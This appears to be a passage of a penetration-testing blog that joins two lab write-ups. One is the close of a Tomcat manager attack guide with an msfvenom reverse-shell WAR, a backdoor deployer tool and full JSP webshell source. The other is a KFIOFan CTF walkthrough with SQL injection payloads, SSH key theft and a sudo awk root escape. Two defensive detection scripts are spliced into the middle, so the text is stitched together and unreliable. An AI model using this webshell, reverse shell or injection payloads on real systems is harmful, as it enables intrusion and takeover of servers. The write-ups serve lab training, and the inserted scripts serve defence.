![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-2GppiHBsVY8/XBUvQXzjPGI/AAAAAAAAbv0/06VAOYSRFkk3G0M4fQTabSxyYN3Q1dBuQCLcBGAs/s1600/3.png?w=687&ssl=1)
Generate .war Format Backdoor
We can use msfvenom to generate a .war format backdoor for a java/jsp payload; just follow the syntax below to create the .war file and then start a Netcat listener.
Syntax: msfvenom -p [payload] LHOST=[Kali Linux IP] LPORT=[1234] -f [file format] > [file name]
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.108 LPORT=1234 -f war > shell.war
nc -lvp 1234
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-4O9R4wjjoB4/XBUvQVNdLQI/AAAAAAAAbvw/TfvX7VlF_C4caJVehuBBi66gwO47DjoLACLcBGAs/s1600/4.png?w=687&ssl=1)
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-9ylL7iOhRTw/XBUvQlk5jSI/AAAAAAAAbv4/poIBBGcmtIcptLomyNTyNJefyJlPfuJMQCLcBGAs/s1600/5.png?w=687&ssl=1)
Now log in to the Tomcat manager application using tomcat:tomcat as username:password. You will be welcomed by the admin dashboard, where you can upload a .war file.
As you can observe, I browsed to the malicious shell.war file to deploy it, as highlighted in the image. As soon as you upload the file, you will see a /path entry for it in the Applications table.
To execute your .war file, click on its path in the Applications table, or browse directly to http://target_IP:port/file_name.
As soon as you execute the file you will get the reverse connection in Netcat.
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-PqRVdSCmBj0/XBUvRZVgiWI/AAAAAAAAbv8/kOyp19wpH4wONm4QgjsZ8vageLgAXUKIgCLcBGAs/s1600/6.png?w=687&ssl=1)
Booom!!! One more time we have access to the remote server.
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-03aPEVm_yYQ/XBUvRvcr0QI/AAAAAAAAbwA/PvZl1QqsR28JJy1Q0W9PPmqpskU4EZQ8gCLcBGAs/s1600/7.png?w=687&ssl=1)
Tomcat War Deployer Script
This is a penetration testing tool intended to leverage Apache Tomcat credentials in order to automatically generate and deploy a JSP backdoor, then invoke it and provide a shell (either via a web GUI, a listening port bound on the remote machine, or a reverse TCP payload connecting back to the adversary).
In practice, it generates a JSP backdoor WAR package on the fly and deploys it through the Apache Tomcat Manager application using valid HTTP authentication credentials that the pentester provides (or custom ones; in the end, we all love tomcat:tomcat).
You can download it from here:
[To see content please register here]
git clone
[To see content please register here]
cd tomcatWarDeployer
ls
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-BRXsz5-2X2E/XBUvR9YiQUI/AAAAAAAAbwE/bSjKDxAMqWkW42vIiTMrjwOLYWeaR3M0ACLcBGAs/s1600/8.png?w=687&ssl=1)
Now follow this syntax to exploit the target machine without uploading the .war file manually.
Syntax: ./tomcatWarDeployer.py -U [username] -P [password] -H [Kali Linux IP] -p [listening port] [target_IP]:[tomcat_port]
./tomcatWarDeployer.py -U tomcat -P tomcat -H 192.168.1.108 -p 4567 192.168.1.101:8080
On executing the above command, I got a webshell directly, as you can observe in the image below.
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-wykeYXUswl8/XBUvSZeSwCI/AAAAAAAAbwI/h7fwe1kZ-Tw_VUSEPnYc9iJLvhrA6nIxwCLcBGAs/s1600/9.png?w=687&ssl=1)
Generate a JSP Webshell
In this part, we are going to see how we can generate and deploy a web shell to gain command execution through the Tomcat manager application.
First we need to write the web shell and package it in .war format. For the JSP web shell we use the following code, which I found at this link:
[To see content please register here]
<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>
Save the code as index.jsp and then execute the following command to package it as a .war file.
mkdir webshell
cp index.jsp webshell/
cd webshell
jar -cvf ../webshell.war *
The above commands produce a war file, which you can deploy in the Tomcat manager application.
![[Image: 11.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-EhkeycNHXYM/XBUvOjdjQqI/AAAAAAAAbvg/lFAMSg6cR7EEvLYzx8188-_W7vR5HV0bACLcBGAs/s1600/11.png?w=687&ssl=1)
As you can observe from the image below, I deployed the webshell.war file and it uploaded successfully; now let’s click on it to execute it.
![[Image: 12.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-YVJErrwk7k0/XBUvOwpwqDI/AAAAAAAAbvk/V6b_8cFiz9QcAM_u7Z5ydGY_22G8IWaOQCLcBGAs/s1600/12.png?w=687&ssl=1)
On opening /webshell you will get an HTTP 404 error, so open the index.jsp file instead, as given below:
[To see content please register here]
On opening the above URL you get the command execution form; use it to run commands.
![[Image: 13.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-Z7ucBVLbZlc/XBUvPUh4lRI/AAAAAAAAbvo/JIiMVd1hDaou8AvJGFhbVDp50aQR3t0lwCLcBGAs/s1600/13.png?w=687&ssl=1)
Hopefully you have enjoyed this article on how to get access to the Tomcat manager using CVE-2007-1860.
Hello friends!! Today we are going to take on another boot2root challenge known as KFIOFan. This lab is designed in French and uses geographical coordinates in France as the starting point of the CTF, where you have to find 4 flags using your web penetration testing skills, since the machine is vulnerable to SQL injection.
Official Description: Two French people want to start the very first fan club of the youtuber Khaos Farbauti Ibn Oblivion. But they’re not very security aware! (IMPORTANT NOTE: The whole challenge is in French, including server conf. Which may add to the difficulty if you are non-native or using a non-azerty keyboard)
You can download this VM from VulnHub.
Penetration Methodology
Network Scanning
- Open port and Running Service (Nmap)
- Abusing Http service for obtaining Credential
- Use robots.txt for the first flag
- Exploiting SQL vulnerability
- Obtain SSH RSA_Key
- SSH Login
- Catch another flag
- Check Sudo rights
- Spawn root access
- Capture the last flag
Network Scanning
Let’s start off with scanning the network to find our target.
nmap -A 192.168.1.105
![[Image: 1.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-7uAeM9x8xMo/XA_TvoGvX6I/AAAAAAAAbss/intGIxRecRglUFo6D6RwwwTq1jq_C82pQCEwYBhgL/s1600/1.png?w=687&ssl=1)
Nmap shows two open ports (22 and 80) on the target machine, so let's navigate to port 80 in the browser.
Enumeration
On exploring port 80, we notice that it requires HTTP authentication, for which we have no credentials. Moreover, there was a text message (This site says: "48.416667 -0.916667") pointing towards some geographical coordinates.
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-4t0iYnm--uE/XA_TwSmPXqI/AAAAAAAAbs8/kRNuWt7tynU4kdqaPvFOnyjQ_x_6gESzQCEwYBhgL/s1600/2.png?w=687&ssl=1)
When we cancelled the authentication prompt, we saw a message in French which said "Let me guess Bob, did you lose your password again? LOL". From this we took Bob as the authorized username.
![[Image: 3.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-WR2XGLV_ohE/XA_Twb9Ma3I/AAAAAAAAbs4/JsaMZvNYrVU47S-9b7AtpCfCd2sp_Yx4ACEwYBhgL/s1600/3.png?w=687&ssl=1)
On searching the coordinates 48.416667 -0.916667 in Google Maps, we get the location "Levaré", which could be the password for user Bob.
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-w4FwORGR4BA/XA_TwwTv3eI/AAAAAAAAbtA/rHzJqJa3xRQJy7ZOp8V3ErD8wcksXAbcQCEwYBhgL/s1600/4.png?w=687&ssl=1)
Hmmmm!! Our prediction was true and we successfully bypassed HTTP authentication using Bob:Levaré.
Note: This is not quite as easy as it looks, because on rebooting the machine the geo-coordinates change, and the password changes accordingly.
Luckily, on exploring /robots.txt, I found our first flag, which was in French; translated, it reads:
FLAG1: Congratulations you found the first flag! (Yes I know you’re hoping for a clue but at least you have the right reflexes!)
![[Image: 5.1.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-KZybZYGVKEg/XA_TxGmcqRI/AAAAAAAAbtE/J6_CFPfujC04MymNAYrOnxI14IYgD76HwCEwYBhgL/s1600/5.1.png?w=687&ssl=1)
As the official description says, "Two French people want to start the very first fan club of the youtuber", and from the web page we can easily read that those two people (Alice and Bob) are the usernames.
Exploit
Again I translated the whole text of this web page and concluded that user "Alice" holds some very crucial information or an important file, such as an SSH key.
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-aYac-LHzbHU/XA_TxcrevMI/AAAAAAAAbtI/eadmgdnxptsg1HfSiGE8zJlXufuMA-28gCEwYBhgL/s1600/5.png?w=687&ssl=1)
A link to Khaosearch brings me to the search form for the CTF author's YouTube channel; without wasting time I check for SQL injection by injecting the following query:
raj" union select 1,2;#
Lol! It was vulnerable to SQL injection, so let's exploit it quickly.
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/--yh764vBeQQ/XA_TxpmzOwI/AAAAAAAAbtM/Npb8kBuXLr4pIBqTtACI7AqICe-YoVhdACEwYBhgL/s1600/6.png?w=687&ssl=1)
With the help of the following query, we try to dump all table and column names from the database.
raj" union select table_name,column_name from information_schema.columns;#
![[Image: 7.1.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-xkqVxnY6Bnc/XA_TxrYMdiI/AAAAAAAAbtQ/1UylJX3aZ7od7nmr3MJC5-FphRg06ZpXwCEwYBhgL/s1600/7.1.png?w=687&ssl=1)
I was stumped when I saw an entry for SSH_Key, so I decided to check it, as it seemed the most interesting.
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-cUQJyQZawFA/XA_TyDaRjvI/AAAAAAAAbtU/UWnRqtKT0TE8UUBHTD-Yd5EOjACpe5ekQCEwYBhgL/s1600/7.png?w=687&ssl=1)
I found another link for Alice when I injected the following query to read the ssh_keys table:
raj" union select * from ssh_keys;#
Alice's entry held a private SSH key, which has to be copied exactly as stored, so I viewed the source code of this page.
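The three probes above leave a recognisable trail in the web server's access log: a closing quote followed by UNION SELECT, reads of information_schema, and a comment terminator. The following detection script is an added example, not part of the original walkthrough; the script name khaosearch.php, the parameter name "search" and the log lines are constructed for illustration.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote_plus

# Constructed Apache combined-log lines: one normal search followed by the two
# UNION-based probes used in the walkthrough (script and parameter names are assumptions).
SAMPLE_LOG = """\
192.168.1.10 - bob [14/May/2020:11:05:01 +0000] "GET /khaosearch.php?search=khaos HTTP/1.1" 200 512
192.168.1.10 - bob [14/May/2020:11:05:09 +0000] "GET /khaosearch.php?search=raj%22+union+select+1%2C2%3B%23 HTTP/1.1" 200 640
192.168.1.10 - bob [14/May/2020:11:05:31 +0000] "GET /khaosearch.php?search=raj%22+union+select+table_name%2Ccolumn_name+from+information_schema.columns%3B%23 HTTP/1.1" 200 9120
192.168.1.11 - - [14/May/2020:11:06:02 +0000] "GET /robots.txt HTTP/1.1" 200 88
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Signatures of UNION-based enumeration: a quote closing the string literal, UNION SELECT,
# reads of the schema catalogue, and the trailing comment that discards the rest of the query.
SQLI_RULES = [
    ("union-select", re.compile(r"""["']\s*union\s+(all\s+)?select\b""", re.I)),
    ("schema-enumeration", re.compile(r"\binformation_schema\.(columns|tables)\b", re.I)),
    ("comment-terminator", re.compile(r";\s*(#|--)\s*$")),
]

def decode_params(target):
    """Return {param: [values]} for a request target; parse_qs decodes once,
    the extra unquote_plus catches double-encoded payloads."""
    qs = urlparse(target).query
    return {k: [unquote_plus(v) for v in vs]
            for k, vs in parse_qs(qs, keep_blank_values=True).items()}

def detect_sqli(log_text):
    """Return (client_ip, param, [matched rule names]) for each request that hits a rule."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-log line we can parse
        for param, values in decode_params(m["target"]).items():
            for value in values:
                matched = [name for name, rx in SQLI_RULES if rx.search(value)]
                if matched:
                    hits.append((m["ip"], param, matched))
    return hits

if __name__ == "__main__":
    for ip, param, rules in detect_sqli(SAMPLE_LOG):
        print(f"{ip} param={param} rules={','.join(rules)}")
```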
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-6G0N46UTY2M/XA_TyQYxWMI/AAAAAAAAbtY/1ZUv3Hotvaczd_9T_rTOjFR6O9zecz-cgCEwYBhgL/s1600/9.png?w=687&ssl=1)
Then copy the RSA key from -----BEGIN RSA PRIVATE KEY----- to -----END RSA PRIVATE KEY----- and paste it into a text file named "id_rsa", then set permission 600 so that SSH accepts the key file.
chmod 600 id_rsa
![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-mANas1OyPjw/XA_Tvu0UNkI/AAAAAAAAbsw/yoWY4UatFW0HPqHt6voGxAbetQdZLOrFACEwYBhgL/s1600/10.png?w=687&ssl=1)
Privilege Escalation
Now connect over SSH using the above key and run the following commands:
ssh alice@192.168.1.105 -i id_rsa
ls
cat flag3.txt
So we have successfully connected over SSH and found the 3rd flag as well.
FLAG 3: Congratulations on coming here. This shows that you master very well the essential concepts! One last little effort and the root is yours!
For the 4th flag we need to escalate to root privileges, so let's identify the sudo rights of alice with the help of the following command.
sudo -l
Hmmm!! So alice can run awk as root without a password, and we can easily spawn a root shell by abusing this permission.
sudo awk 'BEGIN {system("/bin/bash")}'
ls
cat flag4.txt
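The awk grant above is the kind of sudoers rule an administrator should catch before an attacker does: any binary that can call system() or spawn an editor is root-equivalent once it runs as root. The audit below is an added example, not part of the original walkthrough; the sudoers lines are constructed to model the lab's finding alongside harmless grants.

```python
import re
from pathlib import PurePosixPath

# Constructed /etc/sudoers excerpt (not the lab's real file): alice's awk grant from the
# walkthrough, plus grants that a reviewer should leave alone.
SAMPLE_SUDOERS = """\
# constructed sample sudoers
Defaults env_reset
root    ALL=(ALL:ALL) ALL
alice   ALL=(root) NOPASSWD: /usr/bin/awk
bob     ALL=(root) /usr/bin/systemctl restart apache2
charlie ALL=(root) /usr/bin/vim
dave    ALL=(www-data) NOPASSWD: /usr/bin/find
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/local/bin/snapshot.sh
"""

# Programs that can run arbitrary commands or edit arbitrary files for their caller;
# granting them as root is equivalent to granting a root shell, password or not.
SHELL_ESCAPE_BINARIES = {"awk", "gawk", "mawk", "vi", "vim", "find", "perl", "python", "python3"}

# user  hosts=(runas[:group]) [TAG: ...] cmd[, cmd...]
SPEC_RE = re.compile(r"^(?P<user>\S+)\s+(?P<hosts>\S+)=\((?P<runas>[^)]*)\)\s*"
                     r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")

def audit_sudoers(text):
    """Return (user, command, reason) for every grant that hands out an effective root shell."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments
        m = SPEC_RE.match(line)
        if not m:
            continue                             # Defaults lines, aliases, blanks
        runas = m["runas"].split(":")[0] or "root"   # sudoers defaults the runas user to root
        nopasswd = "NOPASSWD" in m["tags"].upper()
        for cmd in (c.strip() for c in m["cmds"].split(",")):
            if cmd == "ALL":
                continue                         # full root by design; out of scope here
            binary = PurePosixPath(cmd.split()[0]).name
            if runas in ("root", "ALL") and binary in SHELL_ESCAPE_BINARIES:
                reason = "shell-escape binary as root" + (", no password" if nopasswd else "")
                findings.append((m["user"], cmd, reason))
    return findings

if __name__ == "__main__":
    for user, cmd, reason in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{user}: {cmd} -> {reason}")
```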
FLAG 4: COMPLETE! Congratulations to you for coming here: the machine is yours, its survival or destruction is now entirely based on your ethics. Good luck Hacker!
Note: On rebooting this VM the geo-coordinates change each time, which also changes the password and the SSH key, so you get a new password and SSH key on every boot.